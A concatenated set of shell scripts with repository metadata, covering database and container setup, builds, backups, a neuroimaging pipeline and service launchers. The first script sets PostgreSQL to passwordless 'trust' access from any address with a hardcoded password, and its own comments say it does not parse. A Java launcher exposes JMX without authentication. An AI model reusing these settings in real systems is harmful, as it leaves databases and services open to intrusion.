# parse under sh or bash. The `[ -n ${VAR} ]` tests are also always true
# when the var is unset (unquoted empty expansion leaves a bare -n), and
# `su - postgres` would stop the script at an interactive shell. It reads
# like a command checklist that was pasted together rather than a runnable
# script; it needs a full rewrite before use. The trailing docker-run
# commands are similarly alternative invocations, not a coherent sequence.
export DB_SCRIPT=/etc/postgresql/9.4/main/eam43a.sql
export PGPASSFILE=/etc/postgresql/9.4/main/.pgpass && \
if ! [ -f ${PGPASSFILE} ] ; then && \
touch ${PGPASSFILE} && \
fi && \
chmod 600 ${PGPASSFILE} && \
if [ -n ${INSTALL_DB} ] ; then && \
echo "host    all             all             0.0.0.0/0               trust" >> /etc/postgresql/9.4/main/pg_hba.conf && \
sed -i -- 's/md5/trust/g' /etc/postgresql/9.4/main/pg_hba.conf && \
sed -i -- 's/peer/trust/g' /etc/postgresql/9.4/main/pg_hba.conf && \
sed -i "/^#listen_addresses/i listen_addresses='*'" /etc/postgresql/9.4/main/postgresql.conf && \
su - postgres && \
export PGPASSWORD=p@ssw0rd && \
/etc/init.d/postgresql start && \
psql -U postgres -c "ALTER USER postgres WITH PASSWORD '${PGPASSWORD}';" && \
echo "*:*:*:postgres:${PGPASSWORD}" >> ${PGPASSFILE} && \
if [ -n ${DB_NAME} ] ; then && \
/usr/lib/postgresql/9.4/bin/createdb -h localhost -p 5432 -U postgres -D pg_default --no-password -T template1 -O postgres ${DB_NAME} && \
psql -U postgres -c "GRANT ALL ON DATABASE ${DB_NAME} TO postgres;" && \
/usr/lib/postgresql/9.4/bin/psql -U postgres "${DB_NAME}" < "${DB_SCRIPT}" && \
# /usr/lib/postgresql/9.4/bin/pg_restore --host localhost --port 5432 --username "postgres" --dbname "${DB_NAME}" --no-password --verbose /tmp/eam43a.backup
else
psql -U postgres -c "GRANT ALL ON DATABASE postgres TO postgres;" && \
/usr/lib/postgresql/9.4/bin/psql -U postgres "postgres" < "${DB_SCRIPT}" && \
# /usr/lib/postgresql/9.4/bin/pg_restore --host localhost --port 5432 --username "postgres" --dbname "postgres" --no-password --verbose /tmp/eam43a.backup
fi
if [ -n ${DB_USER} ] ; then && \
if [ -n ${DB_PASS} ] ; then && \
psql -U postgres -c "CREATE USER ${DB_USER} WITH PASSWORD '${DB_PASS}';" && \
export PGPASSWORD=${DB_PASS} && \
else
psql -U postgres -c "CREATE USER ${DB_USER} WITH PASSWORD '${DB_USER}';" && \
export PGPASSWORD=${DB_USER} && \
fi && \
psql -U postgres -c "GRANT ALL ON DATABASE ${DB_NAME} TO ${DB_USER};" && \
echo "*:*:*:${DB_USER}:${DB_PASS}" >> ${PGPASSFILE} && \
else
psql -U postgres -c "CREATE USER ${DB_NAME} WITH PASSWORD '${DB_NAME}';" && \
export PGPASSWORD=${DB_NAME} && \
fi && \
sed -i -- 's/trust/md5/g' /etc/postgresql/9.4/main/pg_hba.conf && \
/etc/init.d/postgresql restart && \
exit && \
fi && \
/opt/wildfly/bin/standalone.sh -b 0.0.0.0 -bmanagement 0.0.0.0
#
# start db
nohup su -c '/opt/rh/rh-postgresql94/root/usr/bin/postgres -D /var/lib/pgsql/data/data -c config_file=/var/lib/pgsql/data/data/postgresql.conf' - postgres &
# start server
nohup /opt/jboss-as-7.2.0.Final/bin/standalone.sh -Djboss.server.base.dir=IAREP -b 0.0.0.0 -c standalone.xml >/IAREP.log 2>&1 &
nohup /opt/jboss-as-7.2.0.Final/bin/standalone.sh -Djboss.server.base.dir=IAAPP -b 0.0.0.0 -c standalone.xml >/IAAPP.log 2>&1 &
sleep 2
# docker run -i -t -p 5432:5432 -p 8022:8022 -p 8042:8042 -p 8080:8080 --name ia -h "iahost" -v iadata:/var/lib/pgsql/data yugeshdocker1/wfpgpojowar
# Eureka Server     8761
# Eureka Client 1   9181
# Eureka Client 2   9182
# Web App Http      8080
# Zuul              9080
# Hystrix           8383
# JBoss monitoring  9990
# Tomcat monitoring 8009
# Postgres          5432
docker run -i -t -p 9181:9181 -p 9182:9182 -p 8080:8080 -p 9990:9990 -p 8009:8009 -p 5432:5432 -p 5433:5433 --name tc -v pg94config:/etc/postgresql -v pg94data:/var/lib/postgresql --name tc yugeshdocker1/postgres94tomcat8 /bin/bash
docker run -i -t -p 8761:8761 --name eureka tomcat:jre8 /bin/bash
docker run -i -t -p 9080:9080 --name zuul tomcat:jre8 /bin/bash
docker run -i -t -p 8383:8383 --name hystrix tomcat:jre8 /bin/bash
docker run -i -t -p 9181:9181 -p 8080:8080 -p 8009:8009 -p 5432:5432 --name tc -v pg94config:/etc/postgresql -v pg94data:/var/lib/postgresql --name tc yugeshdocker1/postgres94tomcat8 /bin/bash
docker run -i -t -p 8761:8761 --name eureka tomcat:jre8 /bin/bash
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 --add-host hystrix:192.168.99.100 -i -t -p 9080:9080 -h zuul --name zuul1 yugeshdocker1/zuul /bin/bash
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 -i -t -p 8383:8383 -h hystrix --name hystrix1 yugeshdocker1/hystrix catalina.sh start
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 --add-host zuul:192.168.99.100 --add-host hystrix:192.168.99.100 -i -t -p 8761:8761 -h eureka --name eureka1 yugeshdocker1/eureka /bin/bash
docker run --add-host eurekaclient1:192.168.99.100 --add-host eureka:192.168.99.100 --add-host zuul:192.168.99.100 --add-host hystrix:192.168.99.100 -i -t -p 9181:9181 -p 8080:8080 -p 8009:8009 -p 5432:5432 -h eurekaclient1 --name tc -v pg94config:/etc/postgresql -v pg94data:/var/lib/postgresql --name tc yugeshdocker1/eurekaclient1 /bin/bash
| true
|
7daba34e9ea83ce8b3eb5fe46d6ec31500505764
|
Shell
|
aero31aero/bash-scripts
|
/runc
|
UTF-8
| 351
| 3.34375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
# Compile <name>.c with gcc, feed it the input file, capture its output,
# and display both for quick inspection.
#
# Arguments:
#   $1 - C source file name WITHOUT the .c extension
#   $2 - input file redirected to the program's stdin
#   $3 - output file that captures the program's stdout
clear
SOURCE=$1.c
INPUT=$2
OUTPUT=$3
gcc "$SOURCE"
if [ $? -ne 0 ]; then
	echo "Compilation Error! Please Debug!"
	exit 1
fi
clear
echo "Compilation Successful!"
echo
echo "Program Input:"
echo "===================="
# BUG FIX: show the input file passed as $2 (was hard-coded `cat in`).
cat "$INPUT"
echo
echo "Program Output:"
echo "===================="
./a.out < "$INPUT" > "$OUTPUT"
cat "$OUTPUT"
echo
| true
|
313842b4d8c2f236fe91bd73cd5964ec239f6dff
|
Shell
|
jesse108/script_tools
|
/linux/db_backup.sh
|
UTF-8
| 371
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Mysql DB backup
# jesse_108@163.com
# Dumps the configured database into a dated SQL file under
# /alidata/backup/backup/<year>/<month>/backup_<date>.sql.

dateStr=$(date "+%Y-%m-%d")
year=$(date "+%Y")
month=$(date "+%m")

host="onlinein02.mysql.rds.aliyuncs.com"
db="db_name"
# SECURITY: credentials are hard-coded and -p<pass> is visible in `ps`;
# prefer mysqldump --defaults-extra-file pointing at a chmod-600 option
# file so the password never appears on the command line or in VCS.
passwd="pwd"
username="username"

folder="/alidata/backup/backup/${year}/${month}"
mkdir -p "$folder"

fileName="${folder}/backup_${dateStr}.sql"
mysqldump -h"${host}" -u"${username}" -p"${passwd}" "${db}" > "$fileName"
| true
|
25e1eff1035f55b1e885baf41fc4b62bd341acdb
|
Shell
|
limaia25/slicerDTIwithT1
|
/RegistrationFreeSurferDTIWithoutT2.sh
|
UTF-8
| 6,089
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
## Script to generate the tractographies of the aseg labels and produce FA,
## trace, perpendicular- and parallel-diffusivity volumes; it also builds a
## labelmap with the corpus callosum (its sub-parts).
## Version without a T2 image
##Version Slicer4.3
## Arguments: $1 = output/study directory, $2 = FreeSurfer subject name,
## $3 = DTI DICOM directory, $4.. = aseg label numbers to seed from.
SlicerHome="/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64"
FreeSurferHome="/usr/local/freesurfer"
DTIPrepHome="/home/lapsi/Documentos/extencoesSlicer/DTIPrep_1.1.6_linux64/"
estudo=$1
sujeito=$2
#mkdir $study/$sujeito
#estudo=$study/$sujeito
## Convert DTI to NRRD - DICOM directory: $3
## Three alternatives: 1) from DICOM  2) from FSL-NIFTI  3) Philips
##1)Dicom Siemens and Phillips
'/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/Slicer' --launch '/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/lib/Slicer-4.3/cli-modules/DWIConvert' --conversionMode DicomToNrrd --inputDicomDirectory $3 --outputVolume $estudo/dwi.nhdr
##2)FSL-NIFTI Siemens
#$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DWIConvert' --conversionMode FSLToNrrd  --outputVolume $estudo/dwi.nhdr --inputVolume $estudo/*.nii --inputBVectors $estudo/*.bvec --inputBValues $estudo/*.bval
##3)Phillips, if not use the DWIconvert from DICOM
#'/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/Slicer' --launch '/home/lapsi/Documentos/Slicer-4.3.0-linux-amd64/lib/Slicer-4.3/cli-modules/DWIConvert' --conversionMode DicomToNrrd --inputDicomDirectory $4 --outputVolume $estudo/dwiBefore.nhdr
#unu crop -min 0 0 0 0 -max M M M M-1 -i input-dwi.nhdr -o output-dwi.nhdr
## DTI volume correction (eddy-current co-registration of the DWI volumes)
$DTIPrepHome'/gtractCoregBvalues' --fixedVolume $estudo/dwi.nhdr --movingVolume $estudo/dwi.nhdr  --outputVolume $estudo/dwi_ec.nhdr --eddyCurrentCorrection --maximumStepSize 0.1 --relaxationFactor 0.25 --outputTransform $estudo/ecTransform.tfm
## create the brain mask from the diffusion-weighted volume
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionWeightedVolumeMasking' --removeislands $estudo/dwi_ec.nhdr $estudo/basedti.nhdr $estudo/mask.nrrd
## estimate the diffusion tensor (weighted least squares)
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DWIToDTIEstimation' $estudo/dwi_ec.nhdr $estudo/dti.nhdr $estudo/basedti.nhdr -e WLS
## mask the DTI image (disabled)
##$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/MaskScalarVolume' $estudo/basedti.nhdr $estudo/mask.nrrd $estudo/base.nhdr
# convert aseg and brain volumes with mri_convert (a FreeSurfer tool)
##
export FREESURFER_HOME=$FreeSurferHome
source $FREESURFER_HOME/SetUpFreeSurfer.sh
'/usr/local/freesurfer/bin/mri_convert' $FreeSurferHome/subjects/$sujeito/mri/brain.mgz $estudo/brain.nii.gz
'/usr/local/freesurfer/bin/mri_convert' $FreeSurferHome/subjects/$sujeito/mri/aseg.mgz $estudo/aseg.nii.gz
#'/usr/local/freesurfer/bin/mri_convert' $FreeSurferHome/subjects/$sujeito/mri/aparc.a2009s+aseg.mgz $estudo/aparc.a2009s+aseg.nii.gz
# co-registration of T1 to DTI space (BRAINSFit), then resample aseg with
# the resulting transform using nearest-neighbour interpolation
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/BRAINSFit' --transformType ScaleSkewVersor3D,Affine --fixedVolume $estudo/basedti.nhdr --movingVolume $estudo/brain.nii.gz --outputTransform $estudo/transform1.tfm --outputVolume $estudo/t1DTIunmasked.nhdr --initializeTransformMode useCenterOfHeadAlign --interpolationMode Linear
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/BRAINSResample' --inputVolume $estudo/aseg.nii.gz --outputVolume $estudo/asegFinal.nhdr  --warpTransform $estudo/transform1.tfm --referenceVolume $estudo/mask.nrrd --interpolationMode NearestNeighbor --pixelType int
# compute scalar diffusion metrics (FA, trace, parallel/perpendicular diff.)
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/fa.nhdr -e FractionalAnisotropy
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/trace.nhdr -e Trace
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/pad.nhdr -e ParallelDiffusivity
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/DiffusionTensorScalarMeasurements' $estudo/dti.nhdr $estudo/ped.nhdr -e PerpendicularDiffusivity
# create the corpus callosum labelmap (FreeSurfer aseg labels 251-255)
$SlicerHome'/Slicer' --launch $SlicerHome'/lib/Slicer-4.3/cli-modules/ThresholdScalarVolume' --thresholdtype Outside -l 251 -u 255 $estudo/asegFinal.nhdr $estudo/cc.nhdr
# run tractography seeding for each label number passed from argument 4 on
# (note: the Seeding module here comes from the older Slicer3 tree)
i=1
for p in $*; do
if [ $i -gt 3 ]; then
$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/Seeding' $estudo/dti.nhdr $estudo/aseg$p.vtp -a $estudo/asegFinal.nhdr -s 1 -f FractionalAnisotropy -o $p
fi
let i=i+1
done
######old#################################################
# co-registration of lhOCC, rhOCC and aparc+aseg (old, disabled)
##$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/ResampleVolume2' /usr/local/freesurfer/subjects/$sujeito/mri/lhoccipital.nii.gz $estudo/lhocc.nhdr -f $estudo/transform2.tfm -R $estudo/mask.nrrd --bulk --transform_order output-to-input -i nn
##$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/ResampleVolume2' /usr/local/freesurfer/subjects/$sujeito/mri/rhoccipital.nii.gz $estudo/rhocc.nhdr -f $estudo/transform2.tfm -R $estudo/mask.nrrd --bulk --transform_order output-to-input -i nn
##$SlicerHome'/Slicer3' --launch $SlicerHome'/lib/Slicer3/Plugins/ResampleVolume2' /usr/local/freesurfer/subjects/$sujeito/mri/aparc.a2009s+aseg.nii.gz $estudo/aparc.a2009s+aseg.nhdr -f $estudo/transform2.tfm -R $estudo/mask.nrrd --bulk --transform_order output-to-input -i nn
#All fiberbundle
##'/home/lapsi/Documentos/Slicer3-3.6.3-2011-03-04-linux-x86_64/Slicer3' --launch '/home/lapsi/Documentos/Slicer3-3.6.3-2011-03-04-linux-x86_64/lib/Slicer3/Plugins/Seeding' /usr/local/Estudos/EstudoOCD/Analise_DTI_OCD/ControloDICOM/ANJOS_ANTONIO_MIGUEL_NEVES_FERREIRA/lili/dti.nhdr /usr/local/Estudos/EstudoOCD/Analise_DTI_OCD/ControloDICOM/ANJOS_ANTONIO_MIGUEL_NEVES_FERREIRA/lili/mask.nrrd /usr/local/Estudos/EstudoOCD/Analise_DTI_OCD/ControloDICOM/ANJOS_ANTONIO_MIGUEL_NEVES_FERREIRA/lili/allFB.vtp -s 2 -f FractionalAnisotropy -o 1
|
95bb69e2c9ee2ec118dbc780c341259372b05fd5
|
Shell
|
taiat/scripts
|
/public/aes-encrypt.sh
|
UTF-8
| 201
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Encrypt a file with AES-256-CBC using OpenSSL.
# Usage: ./aes-encrypt.sh <input-file>
# Prompts for the output file name, then for the encryption password
# (openssl itself asks for the password).

# Require exactly one readable input file.
if [ $# -ne 1 ] || [ ! -f "$1" ]; then
    echo "Usage: $0 <input-file>" >&2
    exit 1
fi

echo "You are encrypting file: " "$1" "."
echo "Write file output name: "
# -r keeps backslashes in the name literal.
read -r name

# Refuse an empty output name so openssl does not fail cryptically.
if [ -z "$name" ]; then
    echo "Output file name must not be empty" >&2
    exit 1
fi

echo "Type strong password!"
openssl enc -aes-256-cbc -in "$1" -out "$name"
| true
|
694c99b03c699fd4083bb02079235093cb4774a5
|
Shell
|
w3bservice/linux
|
/sh/bitcoin.sh
|
UTF-8
| 1,200
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/sh
# Build Berkeley DB 4.8 and Boost 1.64 from source, then configure a
# headless Bitcoin Core build against them (static BDB).
set -e

BITCOIN_ROOT=/mnt/bitd
# Pick some path to install BDB to, here we create a directory within the bitcoin directory
BDB_PREFIX="${BITCOIN_ROOT}/db4"
mkdir -p "$BDB_PREFIX"

# Work inside BITCOIN_ROOT so every relative path below is anchored there.
# (The original downloaded/extracted BDB into the caller's cwd but later
# cd'ed to a path relative to the boost dir, which could not succeed.)
cd "$BITCOIN_ROOT"

# Fetch the source and verify that it is not tampered with.
# Note: sha256sum -c requires TWO spaces between hash and filename;
# the single-space form is rejected as "no properly formatted" lines.
wget 'http://download.oracle.com/berkeley-db/db-4.8.30.NC.tar.gz'
echo '12edc0df75bf9abd7f82f821795bcee50f42cb2e5f76a6a281b85732798364ef  db-4.8.30.NC.tar.gz' | sha256sum -c
tar -xzvf db-4.8.30.NC.tar.gz

# Fetch and build Boost; install the static libraries under deps/.
wget https://sourceforge.net/projects/boost/files/boost/1.64.0/boost_1_64_0.tar.bz2/download -O boost_1_64_0.tar.bz2
tar jxvf boost_1_64_0.tar.bz2
cd boost_1_64_0
./bootstrap.sh
./b2 --prefix=/mnt/bitd/deps link=static runtime-link=static install

# Build the BDB library and install to our prefix.
# Note: Do a static build so that it can be embedded into the executable,
# instead of having to find a .so at runtime.
cd "$BITCOIN_ROOT/db-4.8.30.NC/build_unix"
../dist/configure --enable-cxx --disable-shared --with-pic --prefix="$BDB_PREFIX"
make install

# Configure Bitcoin Core to use our own-built instance of BDB.
cd "$BITCOIN_ROOT"
./autogen.sh
./configure --prefix="$BITCOIN_ROOT" --without-gui LDFLAGS="-L${BDB_PREFIX}/lib/" CPPFLAGS="-I${BDB_PREFIX}/include/"
| true
|
54d6cfa326da30b324f838a9d9b08ed0ba6fdcc8
|
Shell
|
pwr-kstasinski/Z03-24g
|
/Lab 2/Solutions/zadanie6.sh
|
UTF-8
| 415
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
# Recursively list the sub-directories beneath a user-supplied path.
# Top-level directories are printed bare; deeper levels carry a prefix
# that doubles per level ("--", "----", "--------", ...), matching the
# original counter/counterhelp behaviour, now merged into one function.

# print_tree DIR PREFIX CHILD_PREFIX
#   DIR          - directory whose sub-directories are listed
#   PREFIX       - marker printed before entries at this level
#   CHILD_PREFIX - marker for the next level (doubled on each recursion)
print_tree(){
for entry in "$1"/*
do
if [ -d "$entry" ]
then
printf '%s%s\n' "$2" "$entry"
print_tree "$entry" "$3" "$3$3"
fi
done
}

echo -n "Sciezka: "
# -r keeps backslashes literal; tolerate EOF on non-interactive input.
read -r path || path=""

# Only descend into a real directory; an empty path would otherwise
# glob ""/* and walk the filesystem root. (Also drops the stray
# trailing "read path" the original left at end of file.)
if [ -d "$path" ]
then
print_tree "$path" "" "--"
fi
| true
|
4bf70fdbd3f91c6ddc7b3359eedd90fccfdbfbe1
|
Shell
|
mqwHub/kafka-client
|
/bin/start.sh
|
UTF-8
| 1,013
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
# Start the Kafka consumer demo (zx.soft.kafka.demo.ConsumerGroupExample)
# as a background JVM process.
#
# Layout, resolved relative to this script:
#   conf/ -> configuration placed on the classpath
#   lib/  -> dependency jars
#   logs/ -> captured stdout/stderr
#
# Fix: the original shebang read "!/bin/bash" (missing the leading '#').

cd "$(dirname "$0")"
BIN_DIR=$(pwd)
cd ..
DEPLOY_DIR=$(pwd)

CONF_DIR=$DEPLOY_DIR/conf
LIB_DIR=$DEPLOY_DIR/lib
LOGS_DIR=$DEPLOY_DIR/logs

# Build "jar1:jar2:...:" from lib/, then append the conf dir.
LIB_JARS=$(ls "$LIB_DIR" | grep .jar | awk '{print "'$LIB_DIR'/"$0}' | tr "\n" ":")
CLASSPATH="$LIB_JARS:$CONF_DIR"
STDOUT_FILE=$LOGS_DIR/stdout.log

# Pick heap settings according to the JVM bitness.
JAVA_MEM_OPTS=""
BITS=$(java -version 2>&1 | grep -i 64-bit)
if [ -n "$BITS" ]; then
    JAVA_MEM_OPTS=" -server
                    -Xmx2g
                    -Xms2g
                    -Xmn256m
                    -XX:PermSize=128m
                    -Xss256k
                    -XX:+PrintGCDetails
                    -Xloggc:$DEPLOY_DIR/gc.log
                    -XX:+HeapDumpOnOutOfMemoryError
                    -XX:HeapDumpPath=$DEPLOY_DIR "
else
    JAVA_MEM_OPTS=" -server -Xms1g -Xmx1g -XX:PermSize=128m -XX:SurvivorRatio=2 -XX:+UseParallelGC "
fi

# Expose JMX without auth/SSL on port 1099 — trusted networks only.
JAVA_JMX_OPTS=" -Dcom.sun.management.jmxremote.port=1099 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false "

# Make sure the log directory exists before redirecting into it.
mkdir -p "$LOGS_DIR"

echo -e "Starting the service..."
# $JAVA_MEM_OPTS / $JAVA_JMX_OPTS are intentionally unquoted: each holds
# multiple whitespace-separated JVM flags.
nohup java $JAVA_MEM_OPTS $JAVA_JMX_OPTS -classpath "$CLASSPATH" zx.soft.kafka.demo.ConsumerGroupExample > "$STDOUT_FILE" 2>&1 &
| true
|
ef7b2c5b21216694c128b8ddc8b3a9f812e437b7
|
Shell
|
andrewmichael/igluctl
|
/.travis/deploy.sh
|
UTF-8
| 275
| 2.578125
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/bash
# Release igluctl via release-manager. The release tag is the first
# (and only) CLI argument; release-manager reads it from the
# TRAVIS_BUILD_RELEASE_TAG environment variable.
set -e

release_tag="$1"

cd "${TRAVIS_BUILD_DIR}"

export TRAVIS_BUILD_RELEASE_TAG="${release_tag}"

# Verify, version, build and upload in one invocation.
release-manager --config "./.travis/release.yml" --check-version --make-version --make-artifact --upload-artifact

echo "DEPLOY: igluctl deployed..."
| true
|
65623b5fd2cd29c840a94d85ed99da5768bcb3a8
|
Shell
|
JING-XINXING/lmbio_test
|
/RUNP1
|
UTF-8
| 4,803
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
########################################################################################################
# Pipeline1: head of the protein analysis pipeline — raw mass-spec data
#            loading, differential screening, analysis and plotting ("P1").
# Version: v2.6
# Date: 2019/12/30
# New:
# Usage: RUNP1
########################################################################################################
echo "RUNP1执行时间为:"
date
###################################################
## 1. Parameters
foldchange="1.5"
project_type="single_mark"
method="None"
project_path=`pwd` # capture the project root directory
unionplot_parameter="h" # set to "g" to also draw the up/down-regulation plot when there is only one comparison group; the default "h" skips it
###################################################
## 2. Populate the project analysis directory
# SA 0
## Differential protein screening is carried out inside 1.dep
### Single-group labelled, Label free and phosphorylation projects
echo ${project_path} # print the project path
ls -RF ${project_path}/rawdata # inspect the contents of <project>/rawdata
cp ./rawdata/*.xlsx ./1.dep # copy the raw project workbooks into 1.dep
cp ./rawdata/*.txt ./1.dep # raw data for phosphorylation projects
### Multi-group labelled project data
# NOTE(review): `if find PATH` succeeds when PATH exists and fails (printing
# to stderr) when it does not, so it works as an existence test here —
# `[ -e PATH ]` would be the conventional form; confirm before changing.
if find ${project_path}/rawdata/'TMT results 1'
then
echo "是TMT多组标记"
cp -r ${project_path}/rawdata/'TMT results 1' ./1.dep
cp -r ${project_path}/rawdata/'TMT results 2' ./1.dep
cp -r ${project_path}/rawdata/'TMT results 3' ./1.dep
elif find ${project_path}/rawdata/'iTRAQ results 1'
then
echo "是iTRAQ多组标记"
cp -r ${project_path}/rawdata/'iTRAQ results 1' ./1.dep
cp -r ${project_path}/rawdata/'iTRAQ results 2' ./1.dep
cp -r ${project_path}/rawdata/'iTRAQ results 3' ./1.dep
else
echo "不是TMT或iTRAQ多组标记项目"
fi
## 3. Switch into the screening directory
cd ./1.dep
pwd
ls -RF ./
pwd
## 4. Differential protein screening
# condaoff
# source /public/hstore5/proteome/Personal_dir/jingxinxing/software/anaconda3/bin/deactivate
# source /public/hstore5/software/anaconda3/bin/activate # activate the shared anaconda3 env and run prap3 for differential protein/site screening
export PATH=/public/hstore5/software/anaconda3/bin/:$PATH # put the shared anaconda3 env on PATH
### Single-group and multi-group data need different prap3 invocations, so branch on the raw-data layout again
#
if find ${project_path}/rawdata/'TMT results 1'
then
echo "是TMT多组标记"
prap3 -r ${foldchange} -f ${project_type} -e ${method} -i ${project_path}/1.dep
elif find ${project_path}/rawdata/'iTRAQ results 1'
then
echo "是iTRAQ多组标记"
prap3 -r ${foldchange} -f ${project_type} -e ${method} -i ${project_path}/1.dep
else
echo "不是TMT或iTRAQ多组标记项目"
prap3 -r ${foldchange} -f ${project_type} -e ${method}
fi
#
# prap3 -r ${foldchange} -f ${project_type} -e ${method}
## 5. Draw heatmaps, Venn diagrams and volcano plots
# export PATH=/public/hstore5/list/prap/anaconda3/bin/:$PATH
unionplot2m -f ${foldchange}
sleep 3;
### 5.1 When there is a single comparison group, draw the up/down-regulation plot with the commands below
# runprap
source /public/hstore5/software/anaconda3/bin/activate prap # enter the prap environment
unionplot -$unionplot_parameter
source /public/hstore5/software/anaconda3/bin/deactivate prap # leave the prap environment
## 6. R plotting (auto-detect the project type, then run the matching script: (iTRAQ,TMT,Label_free) runplo, (DIA) rundiap, (phosphorylation) runphosp)
pwd=`pwd`
# NOTE(review): assumes the install prefix of the project tree is exactly
# 34 characters, so ${pwd:34} starts with "<project_type>/..." — confirm
# this offset for other deployment paths.
pwd2=`echo ${pwd:34}`
project_type=`echo ${pwd2%%/*}`
## Activate the R plotting environment ##
source /public/hstore5/proteome/Personal_dir/jingxinxing/software/anaconda3/bin/activate
### 1. Project type: iTRAQ, TMT
# if [ ${project_type} -eq 'iTRAQ_TMT' ];
#
if [ ${project_type} == 'iTRAQ_TMT' ];
then
runplo
fi
#
### 2. Project type: Label_free
# if [ ${project_type} -eq 'Label_free' ];
#
if [ ${project_type} == 'Label_free' ];
then
runplo
fi
#
### 3. Project type: DIA
# DIA marker files: the QC .docx and DDA_library.xlsx
# if find ../rawdata/'DDA_library.xlsx' # DIA marker files: the QC .docx and DDA_library.xlsx
# then
# rundiap
# fi
# if [ ${project_type} -eq 'DIA' ];
#
if [ ${project_type} == 'DIA' ];
then
rundiap
fi
#
### 4. Project type: Phosph
# if find ../rawdata/'Phospho (STY)Sites.txt'
# then
# runphosp
# fi
# if [ ${project_type} -eq 'phospho' ];
#
if [ ${project_type} == 'phospho' ];
then
runphosp
fi
#
### 5. Project type: Phospho_DIA
#
if [ ${project_type} == 'Phospho_DIA' ];
then
runphos_dia
fi
#
### 6. Project type: Acetyla_Labelfree
#
if [ ${project_type} == 'Acetyla_LF' ];
then
runacetlf
fi
#
echo
echo "恭喜你!蛋白项目分析流程第一阶段RUNP1(P1)——差异蛋白分析及R绘图完成!"
echo "可以进行下一阶段分析RUNP2(P2)——背景文件准备和富集分析"
date
| true
|
7ba4bc37732e879ae23865a75700e83740b23110
|
Shell
|
zoripong/word-way-backend
|
/install.sh
|
UTF-8
| 279
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Developer bootstrap: must be run inside an activated virtualenv.
# Wires up repo-local git hooks and installs the dev dependencies.
set -e

if [[ -z "$VIRTUAL_ENV" ]]; then
    echo 'You seem not in any virtual environment.' \
        'Please try after activate virtualenv.'
    exit 1
fi

# Use the hooks shipped in the repository instead of .git/hooks.
git config core.hooksPath "$PWD/git/hooks/"

pip install --upgrade pip
pip install -r dev-requirements.txt
| true
|
b399484731c3acc532814c126bf407c64eca69ac
|
Shell
|
giuseppemorelli/docker-devbox
|
/local/bin/phpcs.sh
|
UTF-8
| 232
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Run PHP_CodeSniffer inside the "web" docker-compose service,
# forwarding every CLI argument to phpcs.

# Resolve this script's directory; docker-compose.yml lives one level up.
script_dir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"

cd "${script_dir}/.." || exit

# -T: no TTY (works from hooks/CI); -u $UID: keep file ownership sane.
docker-compose exec -T -u $UID web /var/www/html/project/vendor/bin/phpcs "$@"
| true
|
61b472b08a1ca0afe465456bcff7267294fb2b9a
|
Shell
|
vijayrajah/scripts
|
/sysinfo/get_system_status.sh
|
UTF-8
| 787
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
##Autor: vijay Rajah
##me@rvijay.in
# Collect a system status snapshot: run a fixed list of diagnostic
# commands and append each one's output to a timestamped report file.

# setup_env: initialise the command list, timestamp, PATH and output
# file location. (Renamed from `env`, which shadowed /usr/bin/env.)
setup_env() {
CMDS='uptime
uname -a
date
w
ps aux
df -h
ifconfig -a
iptables -L --line-numbers -v -n
iptables -L --line-numbers -v -n -t nat
pstree -pau
ntpdate -q -u pool.ntp.org
cat /proc/user_beancounters
lsof'
DT=$(date +%Y-%m-%d_%Hh%Mm%Ss)
PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
OUT_DIR=/apps/apps-backup
OUT_FILE=${OUT_DIR}/STAT-${DT}.out
# Split $CMDS on newlines only, so each line is one full command.
IFS='
'
}

# do_stats: run every command in $CMDS, appending a banner plus its
# combined stdout/stderr to $OUT_FILE.
do_stats() {
# Robustness: make sure the report directory exists before appending.
mkdir -p "${OUT_DIR}"
for CMD in $CMDS
do
echo "############################################ ${CMD} ############################################" >> "${OUT_FILE}"
eval ${CMD} >> "${OUT_FILE}" 2>&1
echo "################################################################################################
" >> "${OUT_FILE}"
done
}

setup_env
do_stats
| true
|
